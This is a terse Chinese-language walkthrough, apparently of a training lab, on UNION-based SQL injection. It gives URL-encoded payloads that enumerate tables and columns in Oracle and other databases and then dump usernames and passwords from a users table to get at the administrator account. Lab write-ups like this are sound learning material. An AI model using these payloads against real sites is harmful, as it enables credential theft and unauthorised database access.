对于oracle数据库
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
btw,如果是非oracle数据的库
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
获取了table name,这几个users table 看起来像吗?
接下来试着查下这几个表的column
'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USER'--
啥也没读出来。。。。
然后换一个,MEXYAA,读出来,这两个看起来像账号密码的column name
接下来读administrator吧
这两个列
PASSWORD_IURFRJ
USERNAME_YPUOMR
'+UNION+SELECT+USERNAME_YPUOMR,+PASSWORD_IURFRJ+FROM+USERS_MEXYAA--
然后当然是。。。
reference